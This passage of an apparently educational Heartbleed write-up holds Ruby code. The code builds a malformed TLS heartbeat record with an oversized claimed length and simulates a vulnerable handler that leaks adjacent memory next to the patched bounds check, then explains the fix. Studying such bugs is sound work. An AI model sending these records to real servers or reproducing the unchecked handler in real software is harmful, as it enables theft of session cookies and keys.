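  [0x18, version, fragment.bytesize].pack('Cnn') + fragment
end

# The record the module sends: type=1, claimed payload_length, no payload bytes.
def heartbleed_record(version, claimed_len)
  build_record(version, [HEARTBEAT_REQUEST, claimed_len].pack('Cn'))
end

# A well-formed request: payload_length matches the payload, plus 16 bytes padding.
def legit_heartbeat(version, payload)
  frag = [HEARTBEAT_REQUEST, payload.bytesize].pack('Cn') + payload + ("\x00".b * HB_PADDING)
  build_record(version, frag)
end

# Split a TLS record into header fields and fragment.
def parse_record(data)
  raise ArgumentError, 'short record' if data.bytesize < 5
  type, version, length = data.unpack('Cnn')
  { type: type, version: version, length: length, fragment: data.byteslice(5, length) }
end

# Server-side heartbeat handler. `heap_tail` is whatever sits in memory after the
# received fragment (constructed here). With fixed: false the handler trusts the
# attacker's payload_length and reads past the record; with fixed: true it applies
# the 1.0.1g check and silently discards the request, as RFC 6520 section 4 requires.
def respond(record_bytes, heap_tail, fixed:)
  rec  = parse_record(record_bytes)
  heap = rec[:fragment] + heap_tail            # fragment at offset 0, secrets behind it
  hb_type, payload_len = rec[:fragment].unpack('Cn')
  return nil unless hb_type == HEARTBEAT_REQUEST
  return nil if fixed && 1 + 2 + payload_len + HB_PADDING > rec[:length]
  payload = heap.byteslice(3, payload_len) || ''.b  # offset 3 = after type and length
  [HEARTBEAT_RESPONSE, payload_len].pack('Cn') + payload + ("\x00".b * HB_PADDING)
end

# Extract the echoed payload from a reply; this is what the module appends to
# @state[c][:heartbeats] for each heartbeat it receives.
def reply_payload(reply)
  return nil if reply.nil?
  _type, len = reply.unpack('Cn')
  reply.byteslice(3, len)
end

if __FILE__ == $0
  secret = 'SessionCookie=deadbeef'.b   # constructed stand-in for adjacent heap data
  evil   = heartbleed_record(0x0301, 0x4000)
  leaked = reply_payload(respond(evil, secret, fixed: false))
  puts "vulnerable handler echoed #{leaked.bytesize} bytes: #{leaked.inspect}"
  puts "fixed handler reply: #{respond(evil, secret, fixed: true).inspect}"
end
```

The check in the fixed branch is the whole fix: the record length is the only trustworthy bound, so any payload_length that does not fit inside it with its padding is dropped without a reply. A client-side analogue applies equally, which is why the module can harvest memory from a connecting client and not only from a server.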